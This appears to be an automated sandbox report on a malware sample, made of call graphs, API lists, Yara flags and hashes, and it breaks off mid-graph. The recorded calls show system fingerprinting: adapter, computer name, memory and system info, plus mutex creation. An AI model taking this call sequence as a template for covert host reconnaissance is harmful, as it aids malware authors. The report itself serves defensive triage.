63746 7f3390e0 30 API calls 3 library calls 63670->63746 63678 7f334af0 63671->63678 63679 7f334b16 63678->63679 63680 7f334b1b 63678->63680 63689 7f334f30 63679->63689 63682 7f334b87 63680->63682 63698 7f37c600 63680->63698 63683 7f334ca5 63682->63683 63686 7f37c600 32 API calls 63682->63686 63688 7f3463a0 std::ios_base::clear 32 API calls 63682->63688 63707 7f348c30 63683->63707 63686->63682 63687 7f3463a0 std::ios_base::clear 32 API calls 63687->63682 63688->63682 63690 7f37c600 32 API calls 63689->63690 63691 7f334f7e 63690->63691 63692 7f348c30 30 API calls 63691->63692 63693 7f33511e 63692->63693 63694 7f348e60 63693->63694 63695 7f348e77 63694->63695 63696 7f335a16 63694->63696 63695->63696 63714 7f3390e0 30 API calls 3 library calls 63695->63714 63696->63326 63699 7f37c622 63698->63699 63700 7f37c61d 63698->63700 63702 7f37c645 63699->63702 63703 7f37c634 63699->63703 63711 7f37b280 RaiseException Concurrency::cancel_current_task 63700->63711 63705 7f3d0c5b std::_Facet_Register 16 API calls 63702->63705 63706 7f334b55 63702->63706 63712 7f334a80 32 API calls 3 library calls 63703->63712 63705->63706 63706->63687 63708 7f348c57 63707->63708 63709 7f348c96 std::ios_base::_Ios_base_dtor 63707->63709 63708->63709 63713 7f378060 30 API calls Concurrency::cancellation_token_source::~cancellation_token_source 63708->63713 63709->63679 63711->63699 63712->63706 63713->63709 63714->63695 63715->63626 63717 7f34b67d 63716->63717 63719 7f34b5f8 swprintf 63716->63719 63717->63632 63732 7f3d0fac 33 API calls 63719->63732 63721 7f34cd19 63720->63721 63723 7f34cc94 swprintf 63720->63723 63721->63634 63733 7f3d0fac 33 API calls 63723->63733 63725 7f33605a 63724->63725 63726 7f336090 63725->63726 63745 7f3d0028 32 API calls 2 library calls 63725->63745 63734 7f333720 63726->63734 63729 7f3360be 63739 7f348e00 63729->63739 63732->63717 63733->63721 63735 7f37c600 32 API calls 63734->63735 63736 7f33376d 63735->63736 63737 7f3463a0 std::ios_base::clear 32 API calls 63736->63737 63738 7f3337ab 63737->63738 63738->63729 63740 7f348e12 63739->63740 63743 7f348e34 std::ios_base::_Ios_base_dtor 63739->63743 63742 7f37b900 std::ios_base::clear 30 API calls 63740->63742 63741 7f348c30 30 API calls 63744 7f3360e2 63741->63744 63742->63743 63743->63741 63744->63653 63746->63670 63747->63669 63755 7f334cd0 63748->63755 63751 7f334f30 32 API calls 63752 7f335aa7 63751->63752 63753 7f348e60 30 API calls 63752->63753 63754 7f335ab6 63753->63754 63754->63366 63757 7f334cf9 63755->63757 63756 7f334d17 63756->63751 63757->63756 63758 7f37c600 32 API calls 63757->63758 63760 7f334d94 63757->63760 63759 7f334d56 63758->63759 63761 7f3463a0 std::ios_base::clear 32 API calls 63759->63761 63762 7f334f0a 63760->63762 63763 7f37c600 32 API calls 63760->63763 63765 7f3463a0 std::ios_base::clear 32 API calls 63760->63765 63761->63760 63764 7f348c30 30 API calls 63762->63764 63763->63760 63764->63756 63765->63760 63767 7f37c600 32 API calls 63766->63767 63768 7f34860e 63767->63768 63768->63370 63957 7f3514b0 63769->63957 63771 7f3ae593 63772 7f3ae5c2 GetPEB 63771->63772 63773 7f3ae601 63772->63773 63961 7f341f10 63773->63961 63776 7f3ae78e 63779 7f37caa0 32 API calls 63776->63779 63777 7f3ae7f3 63778 7f37caa0 32 API calls 63777->63778 63780 7f34862a 63778->63780 63779->63780 63781 7f3a9c60 GetPEB 63780->63781 63782 7f3a9caf 63781->63782 63783 7f3a9e79 63782->63783 63784 7f3a9e20 63782->63784 63785 7f37caa0 32 API calls 63783->63785 63786 7f37caa0 32 API calls 63784->63786 63787 7f348632 63785->63787 63786->63787 63788 7f3ad5b0 GetPEB 63787->63788 63789 7f3ad716 63788->63789 63790 7f3ad94e GetPEB 63789->63790 63791 7f3adb6d GetPEB 63789->63791 63798 7f3ad984 63790->63798 63792 7f3adbdb 63791->63792 63793 7f3addf4 GetPEB 63792->63793 63792->63798 63793->63798 63794 7f3ae004 GetPEB 63800 7f3ae043 63794->63800 63795 7f3ae23f 63967 7f34d510 63795->63967 63798->63794 63798->63800 63799 7f3ae24c 63799->63799 63801 7f37caa0 32 API calls 63799->63801 63800->63795 63971 7f3d1f75 RaiseException 63800->63971 63802 7f3ae2d3 63801->63802 63803 7f34863a 63802->63803 63972 7f34e400 33 API calls swprintf 63802->63972 63807 7f3ac340 63803->63807 63805 7f3ae2ed 63805->63805 63806 7f37caa0 32 API calls 63805->63806 63806->63803 63974 7f342060 63807->63974 63811 7f3ac3a2 63812 7f3ac578 63811->63812 63813 7f3ac519 63811->63813 63978 7f3cee60 35 API calls _fwprintf_s 63812->63978 63816 7f37caa0 32 API calls 63813->63816 63815 7f3ac589 63818 7f37caa0 32 API calls 63815->63818 63817 7f348642 63816->63817 63819 7f3a9ef0 63817->63819 63818->63817 63980 7f3afa00 63819->63980 63822 7f3a9f12 63823 7f37caa0 32 API calls 63822->63823 63833 7f34864a 63823->63833 63824 7f3a9f7f 63825 7f3aa2fb 63824->63825 63826 7f3aa11b 63824->63826 63827 7f3aa3a1 63825->63827 63829 7f3aa339 63825->63829 63850 7f3aa39c 63825->63850 64004 7f341f40 GetPEB 63826->64004 64000 7f341d30 63827->64000 63829->63829 63830 7f37caa0 32 API calls 63829->63830 63830->63850 63851 7f3aa730 63833->63851 63834 7f3aa28e 63836 7f37caa0 32 API calls 63834->63836 63836->63833 63838 7f3aa4c3 63839 7f37bc30 3 API calls 63838->63839 63840 7f3aa4dd 63839->63840 64006 7f341dc0 GetPEB 63840->64006 63842 7f3aa4f7 64007 7f3cee60 35 API calls _fwprintf_s 63842->64007 63844 7f3aa50a 63845 7f37caa0 32 API calls 63844->63845 63846 7f3aa56e 63845->63846 64008 7f37c230 GetPEB GetPEB 63846->64008 63848 7f3aa577 64009 7f341fd0 GetPEB 63848->64009 64010 7f341f40 GetPEB 63850->64010 64035 7f34ed00 63851->64035 63853 7f3aa753 63854 7f3aa782 GetPEB 63853->63854 63855 7f3aa7ce 63854->63855 63856 7f3aaa00 63855->63856 63858 7f37caa0 32 API calls 63855->63858 64039 7f34bbe0 63856->64039 63858->63856 63859 7f3aaa0d 63860 7f3aaa1e GetPEB 63859->63860 63861 7f3aaa75 63860->63861 63862 7f3aac45 GetPEB 63861->63862 63865 7f3aac79 63861->63865 63862->63865 63864 7f3aae4b 63864->63864 63866 7f37caa0 32 API calls 63864->63866 64043 7f3508b0 63865->64043 63867 7f3aaed2 63866->63867 63868 7f348652 63867->63868 64047 7f34b410 33 API calls swprintf 63867->64047 63872 7f3aaf80 GetPEB 63868->63872 63870 7f3aaeec 63870->63870 63871 7f37caa0 32 API calls 63870->63871 63871->63868 63874 7f3aafbd GetSystemInfo 63872->63874 63874->63385 64051 7f34e4d0 63875->64051 63877 7f3ab153 63878 7f3ab182 GetPEB 63877->63878 63879 7f3ab1c1 63878->63879 63880 7f341f10 GetPEB 63879->63880 63881 7f3ab344 63880->63881 63882 7f3ab34e 63881->63882 63883 7f3ab3b6 63881->63883 63882->63882 63884 7f37caa0 32 API calls 63882->63884 63883->63883 63885 7f37caa0 32 API calls 63883->63885 63886 7f348662 63884->63886 63885->63886 63887 7f3ae390 GetPEB 63886->63887 63890 7f3ae3d7 GlobalMemoryStatusEx 63887->63890 63889 7f3ae54e __aulldiv 63889->63389 63890->63889 63892 7f3ae8c0 GetComputerNameExA 63891->63892 63894 7f3aea3a 63892->63894 63895 7f3aeaa5 63892->63895 63897 7f37caa0 32 API calls 63894->63897 63896 7f341f10 GetPEB 63895->63896 63899 7f3aeab5 63896->63899 63898 7f348672 63897->63898 63904 7f3ab430 63898->63904 63900 7f3aeabf 63899->63900 63901 7f3aeb27 63899->63901 63902 7f37caa0 32 API calls 63900->63902 63903 7f37caa0 32 API calls 63901->63903 63902->63898 63903->63898 64056 7f3d1170 63904->64056 63908 7f3aba2e 64059 7f353660 33 API calls swprintf 63908->64059 63909 7f3ab6a0 64058 7f352420 33 API calls swprintf 63909->64058 63912 7f3ab6ad 63915 7f3ab6be GetPEB 63912->63915 63913 7f3aba45 63916 7f3aba56 GetPEB 63913->63916 63914 7f3ab4b1 GetAdaptersInfo 63914->63908 63914->63909 63919 7f3ab7a7 63915->63919 63917 7f3ababd 63916->63917 64060 7f350c10 33 API calls swprintf 63917->64060 63919->63919 63921 7f37caa0 32 API calls 63919->63921 63920 7f3abcb9 63922 7f3abcca GetPEB 63920->63922 63923 7f34867a 63921->63923 63924 7f3abd30 63922->63924 63950 7f3ac600 63923->63950 64061 7f34fa30 33 API calls swprintf 63924->64061 63926 7f3abf53 63927 7f3abf64 GetPEB 63926->63927 63928 7f3abfcb 63927->63928 64062 7f341e80 GetPEB 63928->64062 63930 7f3ac1c7 64063 7f34e260 33 API calls swprintf 63930->64063 63932 7f3ac1d9 64064 7f341c40 GetPEB 63932->64064 63934 7f3ac201 64065 7f341c40 GetPEB 63934->64065 63936 7f3ac21d 64066 7f3517f0 33 API calls swprintf 63936->64066 63938 7f3ac22f 64067 7f341c40 GetPEB 63938->64067 63940 7f3ac257 64068 7f341c40 GetPEB 63940->64068 63942 7f3ac273 64069 7f34b340 33 API calls swprintf 63942->64069 63944 7f3ac285 64070 7f341c40 GetPEB 63944->64070 63946 7f3ac2ad 64071 7f3cee60 35 API calls _fwprintf_s 63946->64071 63948 7f3ac2c3 63949 7f37caa0 32 API calls 63948->63949 63949->63923 63951 7f3467d0 std::ios_base::clear 32 API calls 63950->63951 63952 7f3ac62b 63951->63952 63953 7f336020 32 API calls 63952->63953 63954 7f3ac64f 63953->63954 63955 7f37b900 std::ios_base::clear 30 API calls 63954->63955 63956 7f348682 63955->63956 63956->63396 63958 7f351581 63957->63958 63960 7f3514fc swprintf 63957->63960 63958->63771 63965 7f3d0fac 33 API calls 63960->63965 63962 7f341f2e 63961->63962 63963 7f341f1c 63961->63963 63962->63776 63962->63777 63966 7f3aef40 GetPEB 63963->63966 63965->63958 63966->63962 63968 7f34d5c9 63967->63968 63970 7f34d544 swprintf 63967->63970 63968->63799 63973 7f3d0fac 33 API calls 63970->63973 63971->63795 63972->63805 63973->63968 63975 7f34207e GetPEB 63974->63975 63976 7f34206c 63974->63976 63975->63811 63979 7f3aef40 GetPEB 63976->63979 63978->63815 63979->63975 63981 7f3afa1f 63980->63981 64011 7f341d60 63981->64011 63986 7f3afcf0 64019 7f341f70 63986->64019 63989 7f3afda7 64027 7f341f40 GetPEB 63989->64027 63991 7f3aff02 63992 7f3b01a9 63991->63992 63994 7f3b006b 63991->63994 64023 7f341cd0 63992->64023 64028 7f341f40 GetPEB 63994->64028 63997 7f3a9f03 63997->63822 63997->63824 63998 7f3b0321 64029 7f341f40 GetPEB 63998->64029 64001 7f341d4e 64000->64001 64002 7f341d3c 64000->64002 64005 7f341eb0 GetPEB 64001->64005 64034 7f3aef40 GetPEB 64002->64034 64004->63834 64005->63838 64006->63842 64007->63844 64008->63848 64009->63850 64010->63833 64012 7f341d7e 64011->64012 64013 7f341d6c 64011->64013 64012->63997 64015 7f341fa0 64012->64015 64030 7f3aef40 GetPEB 64013->64030 64016 7f341fbe CoInitializeSecurity 64015->64016 64017 7f341fac 64015->64017 64016->63986 64031 7f3aef40 GetPEB 64017->64031 64020 7f341f8e 64019->64020 64021 7f341f7c 64019->64021 64020->63989 64020->63991 64032 7f3aef40 GetPEB 64021->64032 64024 7f341cee CoSetProxyBlanket 64023->64024 64025 7f341cdc 64023->64025 64024->63997 64024->63998 64033 7f3aef40 GetPEB 64025->64033 64027->63997 64028->63997 64029->63997 64030->64012 64031->64016 64032->64020 64033->64024 64034->64001 64037 7f34edc9 64035->64037 64038 7f34ed44 swprintf 64035->64038 64037->63853 64048 7f3d0fac 33 API calls 64038->64048 64040 7f34bcc1 64039->64040 64042 7f34bc3c swprintf 64039->64042 64040->63859 64049 7f3d0fac 33 API calls 64042->64049 64044 7f350971 64043->64044 64046 7f3508ec swprintf 64043->64046 64044->63864 64050 7f3d0fac 33 API calls 64046->64050 64047->63870 64048->64037 64049->64040 64050->64044 64052 7f34e5ad 64051->64052 64054 7f34e528 swprintf 64051->64054 64052->63877 64055 7f3d0fac 33 API calls 64054->64055 64055->64052 64057 7f3ab43d GetPEB 64056->64057 64057->63914 64058->63912 64059->63913 64060->63920 64061->63926 64062->63930 64063->63932 64064->63934 64065->63936 64066->63938 64067->63940 64068->63942 64069->63944 64070->63946 64071->63948 64073 7f35301d 64072->64073 64075 7f352f98 swprintf 64072->64075 64073->63402 64119 7f3d0fac 33 API calls 64075->64119 64120 7f3471d0 64076->64120 64083 7f394d40 64084 7f3471d0 51 API calls 64083->64084 64085 7f394d68 64084->64085 64135 7f3bb390 64085->64135 64088 7f3472d0 32 API calls 64089 7f394d9f 64088->64089 64090 7f34a1a0 64089->64090 64091 7f34a210 64090->64091 64092 7f34a1ca 64090->64092 64094 7f34a22c 64091->64094 64142 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 64091->64142 64093 7f3467d0 std::ios_base::clear 32 API calls 64092->64093 64095 7f34a1d7 64093->64095 64094->63408 64102 7f3b0b80 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 64094->64102 64140 7f383dd0 32 API calls std::ios_base::clear 64095->64140 64098 7f34a1f0 64141 7f3d1f75 RaiseException 64098->64141 64100 7f34a201 64101 7f37b900 std::ios_base::clear 30 API calls 64100->64101 64101->64091 64102->63415 64103->63423 64104->63445 64105->63443 64106->63471 64107->63488 64108->63491 64109->63508 64110->63515 64111->63541 64112->63548 64113->63574 64114->63581 64115->63592 64116->63570 64117->63539 64118->63507 64119->64073 64121 7f347243 64120->64121 64123 7f347257 64120->64123 64133 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 64121->64133 64124 7f3bb2b0 64123->64124 64125 7f3bb2c1 64124->64125 64127 7f37cee0 64124->64127 64134 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 64125->64134 64128 7f3472d0 64127->64128 64129 7f3467d0 std::ios_base::clear 32 API calls 64128->64129 64130 7f347339 64129->64130 64131 7f3467d0 std::ios_base::clear 32 API calls 64130->64131 64132 7f347349 64131->64132 64132->64083 64133->64123 64134->64127 64136 7f3bb3a1 64135->64136 64138 7f394d70 64135->64138 64139 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 64136->64139 64138->64088 64139->64138 64140->64098 64141->64100 64142->64094

                      Executed Functions

                      Function 7F35B5AE Relevance: 86.9, APIs: 26, Strings: 18, Instructions: 9906memorysynchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • CreateMutexA.KERNEL32(00000000,00000001,?,?,?,A819E2D1,000CB52E), ref: 7F35BAF4
                      • GetProcessHeap.KERNEL32(FFFFB705,00000000,000000A8,00000000), ref: 7F35BB15
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateHeapMutexProcess
                      • String ID: 4A$-R*$6$APPLY_ALL_SHIMS$B$Directoryexpansion$FailedtocreateJson$Qj9j$TD$Windows::Compat::A$X$Y$Z$advapi32$comdlg32$h$m$tFailedtoaddbootent
                      • API String ID: 2384059268-365978450
                      • Opcode ID: 0ca3a0513a689c9957aef85ee7f3525d98696430cc758b523613a7e10d0c28d1
                      • Instruction ID: 2bbd75380228e47fcbd14802e95995ee33c5dec8681b68a1cf18fa7dea53f75d
                      • Opcode Fuzzy Hash: 0ca3a0513a689c9957aef85ee7f3525d98696430cc758b523613a7e10d0c28d1
                      • Instruction Fuzzy Hash: 74248D7AD04268DFDB14CFAAC8907ADBFF5FB48321F28815AE449A7245D7349990CF60
                      Function 7F3728BF Relevance: 24.4, APIs: 5, Strings: 7, Instructions: 3389COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1382 7f3728bf-7f372e18 call 7f3d0fd0 1394 7f372e1e-7f372ef0 call 7f3d0fd0 * 2 1382->1394 1395 7f37670c-7f376ac5 GetCursor call 7f3467d0 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349d60 GetPEB call 7f33d0c0 Sleep 1382->1395 1404 7f372ef3-7f372f85 call 7f3a32d0 1394->1404 1543 7f36c5b0-7f36c6fd call 7f3d0fd0 1395->1543 1544 7f36c59d-7f36c5aa GetCursorPos 1395->1544 1418 7f373785-7f3737bd 1404->1418 1419 7f372f8b-7f3731c2 call 7f3d0fd0 * 3 call 7f3d1010 1404->1419 1423 7f373aa5-7f373acc call 7f3345e0 call 7f3342d0 1418->1423 1424 7f3737c3-7f3737cf 1418->1424 1419->1418 1513 7f3731c8-7f3731ce 1419->1513 1441 7f373ad2-7f373caf call 7f3345e0 call 7f33d200 call 7f3894d0 call 7f3345e0 call 7f33d200 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f37ca10 call 7f386350 1423->1441 1442 7f373e0d-7f373e33 call 7f3345e0 call 7f3342d0 1423->1442 1424->1423 1428 7f3737d5-7f3737f6 1424->1428 1428->1423 1432 7f3737fc-7f373803 1428->1432 1432->1423 1433 7f373809-7f37382b 1432->1433 1443 7f373831-7f373887 1433->1443 1444 7f37396d 1433->1444 1441->1442 1472 7f3740fa-7f374120 call 7f3345e0 call 7f3342d0 1442->1472 1473 7f373e39-7f373fbe call 7f3345e0 call 7f334770 call 7f38ae30 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 1442->1473 1450 7f373895 1443->1450 1451 7f373889-7f373893 1443->1451 1444->1404 1444->1423 1457 7f37389f-7f373931 1450->1457 1451->1457 1462 7f373943-7f373947 1457->1462 1463 7f373933-7f373941 1457->1463 1468 7f37394e-7f373968 1462->1468 1463->1468 1496 7f3743e7-7f37440d call 7f3345e0 call 7f3342d0 1472->1496 1497 7f374126-7f3742ab call 7f3345e0 call 7f334770 call 7f38c790 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 1472->1497 1473->1472 1532 7f3746d4-7f3746fa call 7f3345e0 call 7f3342d0 1496->1532 1533 7f374413-7f374598 call 7f3345e0 call 7f334770 call 7f38ea10 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 1496->1533 1497->1496 1519 7f3731d5-7f373280 1513->1519 1520 7f3732c1-7f373370 call 7f3d0fd0 * 4 1513->1520 1521 7f373550-7f3735c6 call 7f3d0fd0 1513->1521 1522 7f37345e-7f37354b call 7f3d0fd0 * 2 1513->1522 1534 7f373282-7f373296 1519->1534 1535 7f373298-7f3732a4 1519->1535 1610 7f373386-7f373389 1520->1610 1611 7f373372-7f373384 1520->1611 1554 7f3735d4 1521->1554 1555 7f3735c8-7f3735d2 1521->1555 1522->1418 1583 7f3749c1-7f3749e7 call 7f3345e0 call 7f3342d0 1532->1583 1584 7f374700-7f374885 call 7f3345e0 call 7f334770 call 7f390b80 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 1532->1584 1533->1532 1547 7f3732aa-7f3732bc 1534->1547 1535->1547 1592 7f36c703-7f36c826 call 7f3d0fd0 1543->1592 1593 7f36cf3a-7f36dbae call 7f3d0fd0 * 2 1543->1593 1544->1543 1547->1418 1560 7f3735de-7f37365f call 7f3d1010 call 7f3d0fd0 1554->1560 1555->1560 1560->1418 1625 7f374cae-7f374cd4 call 7f3345e0 call 7f3342d0 1583->1625 1626 7f3749ed-7f374b72 call 7f3345e0 call 7f334770 call 7f3b7f60 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 1583->1626 1584->1583 1657 7f36cd21-7f36cd4c lstrlenW 1592->1657 1658 7f36c82c-7f36c832 1592->1658 1972 7f36dbb0-7f36dbbb 1593->1972 1973 7f36dbbd-7f36dbda 1593->1973 1620 7f373391-7f3733c9 1610->1620 1611->1620 1630 7f3733df-7f3733e2 1620->1630 1631 7f3733cb-7f3733dd 1620->1631 1680 7f374f9b-7f374fc1 call 7f3345e0 call 7f3342d0 1625->1680 1681 7f374cda-7f374e5f call 7f3345e0 call 7f334770 call 7f3b8a40 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 1625->1681 1626->1625 1640 7f3733ea-7f373459 call 7f3d0fd0 1630->1640 1631->1640 1640->1418 1657->1593 1675 7f36cd52-7f36cdd3 1657->1675 1668 7f36ca21-7f36cb39 call 7f3d0fd0 * 2 1658->1668 1669 7f36cb3e-7f36cc2c call 7f3d0fd0 call 7f3d1010 call 7f3d0fd0 1658->1669 1670 7f36c839-7f36ca1c call 7f3d0fd0 * 5 1658->1670 1668->1657 1669->1657 1670->1657 1675->1593 1740 7f374fc7-7f37514c call 7f3345e0 call 7f334770 call 7f376ed0 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 1680->1740 1741 7f375288-7f3752ae call 7f3345e0 call 7f3342d0 1680->1741 1681->1680 1740->1741 1786 7f375575-7f37559b call 7f3345e0 call 7f3342d0 1741->1786 1787 7f3752b4-7f375439 call 7f3345e0 call 7f334770 call 7f376b80 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 1741->1787 1832 7f375862-7f375888 call 7f3345e0 call 7f3342d0 1786->1832 1833 7f3755a1-7f375726 call 7f3345e0 call 7f334770 call 7f377a60 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 1786->1833 1787->1786 1875 7f375b4f-7f375b75 call 7f3345e0 call 7f3342d0 1832->1875 1876 7f37588e-7f375a13 call 7f3345e0 call 7f334770 call 7f3568e0 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 1832->1876 1833->1832 1915 7f375e3c-7f375e62 call 7f3345e0 call 7f3342d0 1875->1915 1916 7f375b7b-7f375d00 call 7f3345e0 call 7f334770 call 7f356730 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 1875->1916 1876->1875 1956 7f376129-7f37614f call 7f3345e0 call 7f3342d0 1915->1956 1957 7f375e68-7f375fed call 7f3345e0 call 7f334770 call 7f377220 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 1915->1957 1916->1915 2000 7f376416-7f37643c call 7f3345e0 call 7f3342d0 1956->2000 2001 7f376155-7f3762da call 7f3345e0 call 7f334770 call 7f3778e0 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 1956->2001 1957->1956 1972->1973 1990 7f36dbe5-7f36e3b0 call 7f397510 call 7f3d0fd0 * 4 SetLastError 1973->1990 1991 7f36dbdc-7f36dbe3 1973->1991 2126 7f36e3b2-7f36e3b9 1990->2126 2127 7f36e3bf-7f36e701 call 7f3d0fd0 1990->2127 1991->1990 2000->1395 2041 7f376442-7f3765d0 call 7f3345e0 call 7f334770 call 7f3573a0 call 7f3492e0 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 2000->2041 2001->2000 2041->1395 2126->2127 2152 7f36e708 2127->2152 2152->2152
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$?$Exceptionencounter$P$c$tFailedtoaddbootent${
                      • API String ID: 0-1123438463
                      • Opcode ID: d68f71fe55dacee6e2c558981dd6e1fb847865e24a46d93e8c20dc73c3eb7192
                      • Instruction ID: b80749bcd0a629ed7c74aa6278375bae4cda3b4813c639ce692477191699b097
                      • Opcode Fuzzy Hash: d68f71fe55dacee6e2c558981dd6e1fb847865e24a46d93e8c20dc73c3eb7192
                      • Instruction Fuzzy Hash: 60739AB6D04268DBDB14DF69CD807EDBBB5EB89300F1481DDE449A7245EB349A80CFA1
                      Function 7F373992 Relevance: 22.0, APIs: 5, Strings: 6, Instructions: 2741sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2166 7f373992-7f373acc call 7f3345e0 call 7f3342d0 2175 7f373ad2-7f373caf call 7f3345e0 call 7f33d200 call 7f3894d0 call 7f3345e0 call 7f33d200 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f37ca10 call 7f386350 2166->2175 2176 7f373e0d-7f373e33 call 7f3345e0 call 7f3342d0 2166->2176 2175->2176 2186 7f3740fa-7f374120 call 7f3345e0 call 7f3342d0 2176->2186 2187 7f373e39-7f373fbe call 7f3345e0 call 7f334770 call 7f38ae30 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 2176->2187 2200 7f3743e7-7f37440d call 7f3345e0 call 7f3342d0 2186->2200 2201 7f374126-7f3742ab call 7f3345e0 call 7f334770 call 7f38c790 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 2186->2201 2187->2186 2222 7f3746d4-7f3746fa call 7f3345e0 call 7f3342d0 2200->2222 2223 7f374413-7f374598 call 7f3345e0 call 7f334770 call 7f38ea10 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 2200->2223 2201->2200 2249 7f3749c1-7f3749e7 call 7f3345e0 call 7f3342d0 2222->2249 2250 7f374700-7f374885 call 7f3345e0 call 7f334770 call 7f390b80 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 2222->2250 2223->2222 2275 7f374cae-7f374cd4 call 7f3345e0 call 7f3342d0 2249->2275 2276 7f3749ed-7f374b72 call 7f3345e0 call 7f334770 call 7f3b7f60 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 2249->2276 2250->2249 2310 7f374f9b-7f374fc1 call 7f3345e0 call 7f3342d0 2275->2310 2311 7f374cda-7f374e5f call 7f3345e0 call 7f334770 call 7f3b8a40 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 2275->2311 2276->2275 2349 7f374fc7-7f37514c call 7f3345e0 call 7f334770 call 7f376ed0 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 2310->2349 2350 7f375288-7f3752ae call 7f3345e0 call 7f3342d0 2310->2350 2311->2310 2349->2350 2385 7f375575-7f37559b call 7f3345e0 call 7f3342d0 2350->2385 2386 7f3752b4-7f375439 call 7f3345e0 call 7f334770 call 7f376b80 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 2350->2386 2422 7f375862-7f375888 call 7f3345e0 call 7f3342d0 2385->2422 2423 7f3755a1-7f375726 call 7f3345e0 call 7f334770 call 7f377a60 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 2385->2423 2386->2385 2452 7f375b4f-7f375b75 call 7f3345e0 call 7f3342d0 2422->2452 2453 7f37588e-7f375a13 call 7f3345e0 call 7f334770 call 7f3568e0 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 2422->2453 2423->2422 2487 7f375e3c-7f375e62 call 7f3345e0 call 7f3342d0 2452->2487 2488 7f375b7b-7f375d00 call 7f3345e0 call 7f334770 call 7f356730 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 2452->2488 2453->2452 2523 7f376129-7f37614f call 7f3345e0 call 7f3342d0 2487->2523 2524 7f375e68-7f375fed call 7f3345e0 call 7f334770 call 7f377220 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 2487->2524 2488->2487 2560 7f376416-7f37643c call 7f3345e0 call 7f3342d0 2523->2560 2561 7f376155-7f3762da call 7f3345e0 call 7f334770 call 7f3778e0 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 2523->2561 2524->2523 2596 7f376442-7f3765d0 call 7f3345e0 call 7f334770 call 